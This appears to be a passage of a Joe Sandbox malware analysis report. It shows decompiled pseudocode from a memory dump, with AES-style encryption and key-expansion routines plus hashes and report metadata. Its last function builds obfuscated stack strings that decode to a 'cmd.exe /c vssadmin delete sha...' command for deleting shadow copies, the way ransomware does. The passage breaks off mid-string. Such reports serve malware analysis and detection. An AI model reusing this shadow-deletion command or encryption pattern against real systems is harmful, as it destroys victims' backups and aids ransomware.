					_t819[2] = _t1115[2] ^  *(0xf1db240 + (_t730 & 0x000000ff) * 4) ^  *(0xf1db640 + (_t811 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t666 & 0x000000ff) * 4) ^  *(0xf1dba40 + (_t561 & 0x000000ff) * 4);
					_t819[3] = _t1115[3] ^  *(0xf1db240 + (_t811 & 0x000000ff) * 4) ^  *(0xf1db640 + (_t558 & 0x000000ff) * 4) ^  *(0xf1dba40 + (_t666 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t731 & 0x000000ff) * 4);
					_t564 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1129 =  &(_t997[4]);
						 *_t1179 = _t1129;
						asm("rol ebx, 0x10");
						_t566 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
						_t820 = _t739 >> 0x10;
						_t567 = _t566 >> 0x10;
						_t732 = _t712 >> 0x10;
						_t733 = _t1129[2] ^  *(0xf1da240 + (_t712 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t739 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t567 & 0x000000ff) * 4);
						_t827 = _t1129[3] ^  *(0xf1da240 + (_t739 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t513 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t732 & 0x000000ff) * 4);
						_t1141 =  *_t1179;
						_t569 =  *(0xf1da240 + (_t513 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t566 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t820 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t732 & 0x000000ff) * 4) ^  *_t1141;
						_t685 =  *(0xf1daa40 + (_t820 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t712 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t566 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t567 & 0x000000ff) * 4) ^ _t1141[1];
						_t1142 =  &(_t1141[4]);
						 *_t1179 = _t1142;
						asm("rol ebx, 0x10");
						_t571 = _t569 & 0xffff0000 | _t685 >> 0x00000010;
						_t828 = _t827 >> 0x10;
						_t572 = _t571 >> 0x10;
						_t734 = _t733 >> 0x10;
						_t712 = _t1142[2] ^  *(0xf1da240 + (_t733 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t827 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t685 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t572 & 0x000000ff) * 4);
						_t739 = _t1142[3] ^  *(0xf1da240 + (_t827 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t569 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t685 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t734 & 0x000000ff) * 4);
						_t997 =  *_t1179;
						_t513 =  *(0xf1da240 + (_t569 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t571 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t828 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t734 & 0x000000ff) * 4) ^  *_t997;
						_t585 =  *(0xf1daa40 + (_t828 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t733 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t571 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t572 & 0x000000ff) * 4) ^ _t997[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1154 =  &(_t997[4]);
							 *_t1179 = _t1154;
							asm("rol ebx, 0x10");
							_t575 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
							_t835 = _t739 >> 0x10;
							_t576 = _t575 >> 0x10;
							_t735 = _t712 >> 0x10;
							_t736 = _t1154[2] ^  *(0xf1da240 + (_t712 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t739 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t576 & 0x000000ff) * 4);
							_t842 = _t1154[3] ^  *(0xf1da240 + (_t739 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t513 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t735 & 0x000000ff) * 4);
							_t1166 =  *_t1179;
							_t578 =  *(0xf1da240 + (_t513 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t575 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t835 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t735 & 0x000000ff) * 4) ^  *_t1166;
							_t702 =  *(0xf1daa40 + (_t835 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t712 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t575 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t576 & 0x000000ff) * 4) ^ _t1166[1];
							_t1167 =  &(_t1166[4]);
							 *_t1179 = _t1167;
							asm("rol ebx, 0x10");
							_t580 = _t578 & 0xffff0000 | _t702 >> 0x00000010;
							_t843 = _t842 >> 0x10;
							_t581 = _t580 >> 0x10;
							_t737 = _t736 >> 0x10;
							_t712 = _t1167[2] ^  *(0xf1da240 + (_t736 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t842 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t702 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t581 & 0x000000ff) * 4);
							_t739 = _t1167[3] ^  *(0xf1da240 + (_t842 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t578 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t702 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t737 & 0x000000ff) * 4);
							_t997 =  *_t1179;
							_t513 =  *(0xf1da240 + (_t578 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t580 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t843 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t737 & 0x000000ff) * 4) ^  *_t997;
							_t585 =  *(0xf1daa40 + (_t843 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t736 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t580 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t581 & 0x000000ff) * 4) ^ _t997[1];
							goto L5;
						} else {
							_t564 = 0xffffffff;
						}
					}
				}
				return _t564;
			}

0x0f1d1023
0x0f1d1027
0x0f1d102b
0x0f1d102f
0x0f1d1033
0x0f1d1042
0x0f1d1046
0x0f1d104d
0x0f1d1050
0x0f1d1053
0x0f1d1056
0x0f1d105f
0x0f1d13c7
0x0f1d13c7
0x0f1d13ca
0x0f1d13d3
0x0f1d1424
0x0f1d1426
0x0f1d145b
0x0f1d145e
0x0f1d148b
0x0f1d148d
0x0f1d148f
0x0f1d1492
0x0f1d1495
0x0f1d1498
0x0f1d149b
0x0f1d14a4
0x0f1d14f5
0x0f1d14f7
0x0f1d152c
0x0f1d152f
0x0f1d155c
0x0f1d155e
0x0f1d1560
0x0f1d1563
0x0f1d1566
0x0f1d1569
0x0f1d156c
0x0f1d1575
0x0f1d15c6
0x0f1d15c8
0x0f1d15fd
0x0f1d1600
0x0f1d162d
0x0f1d162f
0x0f1d1631
0x0f1d1634
0x0f1d1637
0x0f1d163a
0x0f1d163d
0x0f1d1646
0x0f1d1697
0x0f1d1699
0x0f1d16ce
0x0f1d16d1
0x0f1d16fe
0x0f1d1700
0x0f1d1702
0x0f1d1705
0x0f1d1708
0x0f1d170b
0x0f1d170e
0x0f1d1717
0x0f1d1768
0x0f1d176a
0x0f1d179f
0x0f1d17a2
0x0f1d17cf
0x0f1d17d1
0x0f1d17d3
0x0f1d17d6
0x0f1d17d9
0x0f1d17dc
0x0f1d17df
0x0f1d17e8
0x0f1d1839
0x0f1d183b
0x0f1d1870
0x0f1d1873
0x0f1d18a0
0x0f1d18a2
0x0f1d18a4
0x0f1d18a7
0x0f1d18aa
0x0f1d18ad
0x0f1d18b0
0x0f1d18b9
0x0f1d190a
0x0f1d190c
0x0f1d1941
0x0f1d1944
0x0f1d1971
0x0f1d1973
0x0f1d1975
0x0f1d1978
0x0f1d197b
0x0f1d197e
0x0f1d1981
0x0f1d198a
0x0f1d19db
0x0f1d19dd
0x0f1d1a12
0x0f1d1a15
0x0f1d1a42
0x0f1d1a44
0x0f1d1a46
0x0f1d1a49
0x0f1d1a4c
0x0f1d1a4f
0x0f1d1a52
0x0f1d1a5b
0x0f1d1aac
0x0f1d1aae
0x0f1d1ae3
0x0f1d1ae6
0x0f1d1b13
0x0f1d1b15
0x0f1d1b17
0x0f1d1b1a
0x0f1d1b1d
0x0f1d1b20
0x0f1d1b23
0x0f1d1b2c
0x0f1d1b7d
0x0f1d1b7f
0x0f1d1bb4
0x0f1d1bb7
0x0f1d1be4
0x0f1d1bed
0x0f1d1bf1
0x0f1d1bf3
0x0f1d1bf6
0x0f1d1bf9
0x0f1d1bfc
0x0f1d1065
0x0f1d106b
0x0f1d1225
0x0f1d1225
0x0f1d1228
0x0f1d1231
0x0f1d1282
0x0f1d1284
0x0f1d12b9
0x0f1d12bc
0x0f1d12e9
0x0f1d12eb
0x0f1d12ed
0x0f1d12f0
0x0f1d12f3
0x0f1d12f6
0x0f1d12f9
0x0f1d1302
0x0f1d1353
0x0f1d1355
0x0f1d138a
0x0f1d138d
0x0f1d13ba
0x0f1d13bc
0x0f1d13be
0x0f1d13c1
0x0f1d13c4
0x00000000
0x0f1d1071
0x0f1d1077
0x0f1d1083
0x0f1d1086
0x0f1d108f
0x0f1d10e0
0x0f1d10e2
0x0f1d1117
0x0f1d111a
0x0f1d1147
0x0f1d1149
0x0f1d114b
0x0f1d114e
0x0f1d1151
0x0f1d1154
0x0f1d1157
0x0f1d1160
0x0f1d11b1
0x0f1d11b3
0x0f1d11e8
0x0f1d11eb
0x0f1d1218
0x0f1d121a
0x0f1d121c
0x0f1d121f
0x0f1d1222
0x00000000
0x0f1d1079
0x0f1d1079
0x0f1d1079
0x0f1d1077
0x0f1d106b
0x0f1d1c11

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 314b4ce1c5ac05fe0d666a10f3919c1ffcfce930b8b96b1f96e900fa8e4e6cf9
Instruction ID: 5276c85a3e9495c2e0e0770a3ea39cc3b739360bf1df894e72ec329da3e9221d
Opcode Fuzzy Hash: 314b4ce1c5ac05fe0d666a10f3919c1ffcfce930b8b96b1f96e900fa8e4e6cf9
Instruction Fuzzy Hash: 43622731C072788FDB80DF6EE48402673B2EB44333B4A4526AA845B296D67CB575FB74

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D83C0 Relevance: .4, Instructions: 395
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0F1D83C0(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t274;
				signed int _t284;
				signed int _t287;
				unsigned int _t289;
				intOrPtr _t297;
				signed int _t306;
				signed int _t309;
				unsigned int _t311;
				intOrPtr _t319;
				signed int _t328;
				signed int _t331;
				unsigned int _t333;
				intOrPtr _t341;
				signed int _t350;
				signed int _t353;
				unsigned int _t355;
				intOrPtr _t363;
				signed int _t372;
				signed int _t375;
				unsigned int _t377;
				intOrPtr _t385;
				signed int _t394;
				signed int _t397;
				unsigned int _t399;
				intOrPtr _t407;
				signed int _t416;
				intOrPtr* _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t441;
				intOrPtr _t442;
				signed int _t458;
				intOrPtr _t459;
				signed int _t475;
				intOrPtr _t476;
				signed int _t492;
				intOrPtr _t493;
				signed int _t509;
				intOrPtr _t510;
				signed int _t526;
				intOrPtr _t527;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				intOrPtr _t568;

				_t274 = _a4;
				_t420 = _a8;
				_t428 =  *_t274;
				_v12 = _t428;
				 *_t420 = _t428;
				_t429 =  *((intOrPtr*)(_t274 + 4));
				 *((intOrPtr*)(_t420 + 4)) = _t429;
				_v16 = _t429;
				_t430 =  *((intOrPtr*)(_t274 + 8));
				 *((intOrPtr*)(_t420 + 8)) = _t430;
				_v8 = _t430;
				_t431 =  *((intOrPtr*)(_t274 + 0xc));
				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
				_t543 =  *(_t274 + 0x10);
				 *(_t420 + 0x10) = _t543;
				_t561 =  *(_t274 + 0x14);
				 *(_t420 + 0x14) = _t561;
				_a4 = _t431;
				_t553 =  *(_t274 + 0x18);
				 *(_t420 + 0x18) = _t553;
				_t421 =  *(_t274 + 0x1c);
				 *(_a8 + 0x1c) = _t421;
				_t284 = _v12 ^  *(0xf1dba40 + (_t421 >> 0x18) * 4) ^  *(0xf1db640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t421 & 0x000000ff) * 4) ^  *0xf1da200;
				_v12 = _t284;
				 *(_a8 + 0x20) = _t284;
				_t441 = _v16 ^ _t284;
				_v16 = _t441;
				 *(_a8 + 0x24) = _t441;
				_t287 = _v8 ^ _t441;
				_t442 = _a8;
				_v8 = _t287;
				 *(_t442 + 0x28) = _t287;
				_t289 = _a4 ^ _v8;
				 *(_t442 + 0x2c) = _t289;
				_a4 = _t289;
				_t297 = _a8;
				_t544 = _t543 ^  *(0xf1dbe40 + (_t289 >> 0x18) * 4) ^  *(0xf1dba40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1db240 + (_a4 & 0x000000ff) * 4);
				_t562 = _t561 ^ _t544;
				_t554 = _t553 ^ _t562;
				_t422 = _t421 ^ _t554;
				 *(_t297 + 0x30) = _t544;
				 *(_t297 + 0x34) = _t562;
				 *(_t297 + 0x38) = _t554;
				 *(_t297 + 0x3c) = _t422;
				_t306 = _v12 ^  *(0xf1dba40 + (_t422 >> 0x18) * 4) ^  *(0xf1db640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t422 & 0x000000ff) * 4) ^  *0xf1da204;
				_v12 = _t306;
				 *(_a8 + 0x40) = _t306;
				_t458 = _v16 ^ _t306;
				_v16 = _t458;
				 *(_a8 + 0x44) = _t458;
				_t309 = _v8 ^ _t458;
				_t459 = _a8;
				_v8 = _t309;
				 *(_t459 + 0x48) = _t309;
				_t311 = _a4 ^ _v8;
				 *(_t459 + 0x4c) = _t311;
				_a4 = _t311;
				_t319 = _a8;
				_t545 = _t544 ^  *(0xf1dbe40 + (_t311 >> 0x18) * 4) ^  *(0xf1dba40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1db240 + (_a4 & 0x000000ff) * 4);
				_t563 = _t562 ^ _t545;
				_t555 = _t554 ^ _t563;
				_t423 = _t422 ^ _t555;
				 *(_t319 + 0x50) = _t545;
				 *(_t319 + 0x54) = _t563;
				 *(_t319 + 0x58) = _t555;
				 *(_t319 + 0x5c) = _t423;
				_t328 = _v12 ^  *(0xf1dba40 + (_t423 >> 0x18) * 4) ^  *(0xf1db640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t423 & 0x000000ff) * 4) ^  *0xf1da208;
				_v12 = _t328;
				 *(_a8 + 0x60) = _t328;
				_t475 = _v16 ^ _t328;
				_v16 = _t475;
				 *(_a8 + 0x64) = _t475;
				_t331 = _v8 ^ _t475;
				_t476 = _a8;
				_v8 = _t331;
				 *(_t476 + 0x68) = _t331;
				_t333 = _a4 ^ _v8;
				 *(_t476 + 0x6c) = _t333;
				_a4 = _t333;
				_t341 = _a8;
				_t546 = _t545 ^  *(0xf1dbe40 + (_t333 >> 0x18) * 4) ^  *(0xf1dba40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1db240 + (_a4 & 0x000000ff) * 4);
				_t564 = _t563 ^ _t546;
				_t556 = _t555 ^ _t564;
				_t424 = _t423 ^ _t556;
				 *(_t341 + 0x70) = _t546;
				 *(_t341 + 0x74) = _t564;
				 *(_t341 + 0x78) = _t556;
				 *(_t341 + 0x7c) = _t424;
				_t350 = _v12 ^  *(0xf1dba40 + (_t424 >> 0x18) * 4) ^  *(0xf1db640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t424 & 0x000000ff) * 4) ^  *0xf1da20c;
				_v12 = _t350;
				 *(_a8 + 0x80) = _t350;
				_t492 = _v16 ^ _t350;
				_v16 = _t492;
				 *(_a8 + 0x84) = _t492;
				_t353 = _v8 ^ _t492;
				_t493 = _a8;
				_v8 = _t353;
				 *(_t493 + 0x88) = _t353;
				_t355 = _a4 ^ _v8;
				 *(_t493 + 0x8c) = _t355;
				_a4 = _t355;
				_t363 = _a8;
				_t547 = _t546 ^  *(0xf1dbe40 + (_t355 >> 0x18) * 4) ^  *(0xf1dba40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1db240 + (_a4 & 0x000000ff) * 4);
				_t565 = _t564 ^ _t547;
				_t557 = _t556 ^ _t565;
				 *(_t363 + 0x90) = _t547;
				 *(_t363 + 0x94) = _t565;
				 *(_t363 + 0x98) = _t557;
				_t425 = _t424 ^ _t557;
				 *(_t363 + 0x9c) = _t425;
				_t372 = _v12 ^  *(0xf1dba40 + (_t425 >> 0x18) * 4) ^  *(0xf1db640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t425 & 0x000000ff) * 4) ^  *0xf1da210;
				_v12 = _t372;
				 *(_a8 + 0xa0) = _t372;
				_t509 = _v16 ^ _t372;
				_v16 = _t509;
				 *(_a8 + 0xa4) = _t509;
				_t375 = _v8 ^ _t509;
				_t510 = _a8;
				_v8 = _t375;
				 *(_t510 + 0xa8) = _t375;
				_t377 = _a4 ^ _v8;
				 *(_t510 + 0xac) = _t377;
				_a4 = _t377;
				_t385 = _a8;
				_t548 = _t547 ^  *(0xf1dbe40 + (_t377 >> 0x18) * 4) ^  *(0xf1dba40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1db240 + (_a4 & 0x000000ff) * 4);
				_t566 = _t565 ^ _t548;
				_t558 = _t557 ^ _t566;
				_t426 = _t425 ^ _t558;
				 *(_t385 + 0xb0) = _t548;
				 *(_t385 + 0xb4) = _t566;
				 *(_t385 + 0xb8) = _t558;
				 *(_t385 + 0xbc) = _t426;
				_t394 = _v12 ^  *(0xf1dba40 + (_t426 >> 0x18) * 4) ^  *(0xf1db640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t426 & 0x000000ff) * 4) ^  *0xf1da214;
				_v12 = _t394;
				 *(_a8 + 0xc0) = _t394;
				_t526 = _v16 ^ _t394;
				_v16 = _t526;
				 *(_a8 + 0xc4) = _t526;
				_t397 = _v8 ^ _t526;
				_t527 = _a8;
				_v8 = _t397;
				 *(_t527 + 0xc8) = _t397;
				_t399 = _a4 ^ _v8;
				 *(_t527 + 0xcc) = _t399;
				_a4 = _t399;
				_t407 = _a8;
				_t549 = _t548 ^  *(0xf1dbe40 + (_t399 >> 0x18) * 4) ^  *(0xf1dba40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1db240 + (_a4 & 0x000000ff) * 4);
				_t567 = _t566 ^ _t549;
				_t559 = _t558 ^ _t567;
				_t427 = _t426 ^ _t559;
				 *(_t407 + 0xd4) = _t567;
				_t568 = _t407;
				 *(_t407 + 0xd0) = _t549;
				 *(_t568 + 0xd8) = _t559;
				 *(_t568 + 0xdc) = _t427;
				_t416 = _v12 ^  *(0xf1dba40 + (_t427 >> 0x18) * 4) ^  *(0xf1db640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf1db240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t427 & 0x000000ff) * 4) ^  *0xf1da218;
				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
				_t542 = _v16 ^ _t416;
				 *(_t568 + 0xe0) = _t416;
				_t551 = _v8 ^ _t542;
				 *(_t568 + 0xe4) = _t542;
				 *(_t568 + 0xec) = _a4 ^ _t551;
				 *(_t568 + 0xe8) = _t551;
				 *((char*)(_t568 + 0xf0)) = 0xe0;
				return 0;
			}

0x0f1d83c6
0x0f1d83ca
0x0f1d83ce
0x0f1d83d0
0x0f1d83d3
0x0f1d83d5
0x0f1d83d8
0x0f1d83db
0x0f1d83de
0x0f1d83e1
0x0f1d83e4
0x0f1d83e7
0x0f1d83ea
0x0f1d83ed
0x0f1d83f0
0x0f1d83f3
0x0f1d83f6
0x0f1d83f9
0x0f1d83fd
0x0f1d8400
0x0f1d8403
0x0f1d840e
0x0f1d8449
0x0f1d844e
0x0f1d8451
0x0f1d8457
0x0f1d845c
0x0f1d845f
0x0f1d8465
0x0f1d8467
0x0f1d846a
0x0f1d846d
0x0f1d8473
0x0f1d8476
0x0f1d847b
0x0f1d84b2
0x0f1d84b5
0x0f1d84b7
0x0f1d84b9
0x0f1d84bb
0x0f1d84bd
0x0f1d84c0
0x0f1d84c3
0x0f1d84c6
0x0f1d8506
0x0f1d850b
0x0f1d850e
0x0f1d8514
0x0f1d8519
0x0f1d851c
0x0f1d8522
0x0f1d8524
0x0f1d8527
0x0f1d852a
0x0f1d8530
0x0f1d8533
0x0f1d8538
0x0f1d856f
0x0f1d8572
0x0f1d8574
0x0f1d8576
0x0f1d8578
0x0f1d857a
0x0f1d857f
0x0f1d8582
0x0f1d8585
0x0f1d85c3
0x0f1d85c8
0x0f1d85cb
0x0f1d85d1
0x0f1d85d6
0x0f1d85d9
0x0f1d85df
0x0f1d85e1
0x0f1d85e4
0x0f1d85e7
0x0f1d85ed
0x0f1d85f0
0x0f1d85f5
0x0f1d862c
0x0f1d862f
0x0f1d8631
0x0f1d8633
0x0f1d8635
0x0f1d8637
0x0f1d863c
0x0f1d863f
0x0f1d8642
0x0f1d8680
0x0f1d8685
0x0f1d8688
0x0f1d8691
0x0f1d8696
0x0f1d8699
0x0f1d86a2
0x0f1d86a4
0x0f1d86a7
0x0f1d86aa
0x0f1d86b3
0x0f1d86b6
0x0f1d86be
0x0f1d86f5
0x0f1d86f8
0x0f1d86fa
0x0f1d86fc
0x0f1d86fe
0x0f1d8704
0x0f1d870a
0x0f1d8710
0x0f1d8712
0x0f1d8755
0x0f1d875a
0x0f1d875d
0x0f1d8766
0x0f1d876b
0x0f1d876e
0x0f1d8777
0x0f1d8779
0x0f1d877c
0x0f1d877f
0x0f1d8788
0x0f1d878b
0x0f1d8793
0x0f1d87ca
0x0f1d87cd
0x0f1d87cf
0x0f1d87d1
0x0f1d87d3
0x0f1d87d5
0x0f1d87dd
0x0f1d87e3
0x0f1d87e9
0x0f1d882a
0x0f1d882f
0x0f1d8832
0x0f1d883b
0x0f1d8840
0x0f1d8843
0x0f1d884c
0x0f1d884e
0x0f1d8851
0x0f1d8854
0x0f1d885d
0x0f1d8860
0x0f1d8868
0x0f1d889f
0x0f1d88a2
0x0f1d88a4
0x0f1d88a6
0x0f1d88a8
0x0f1d88aa
0x0f1d88b2
0x0f1d88b4
0x0f1d88c5
0x0f1d88cb
0x0f1d8905
0x0f1d8907
0x0f1d8914
0x0f1d8916
0x0f1d891f
0x0f1d8923
0x0f1d8929
0x0f1d8931
0x0f1d8937
0x0f1d8943

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76fd97ed8ebee5021e1d9bc456efe14c5208ef81baceb5f61abc9d3f95bd801
Instruction ID: 724e1c20cc61e620f080a8d6526da70ac46e88b2219f64cd4ccac74bcf388c1e
Opcode Fuzzy Hash: c76fd97ed8ebee5021e1d9bc456efe14c5208ef81baceb5f61abc9d3f95bd801
Instruction Fuzzy Hash: 0212E970A151189FCB48CF2DD49096ABBF1FB8D311B4281AEE94ADB381CB35EA51DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D5EC0 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
Instruction ID: a2af332ed8b2fc9a734fe6c914bdff1065194a9bbba3ba64ab19f0edc09ff2b9
Opcode Fuzzy Hash: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
Instruction Fuzzy Hash: FDD1AA71E002168FCB24CF58C880BBAB7B5FF88314F6945A9E855AB346D735F961CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D43E0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F1D43E0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0F1D3B20(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
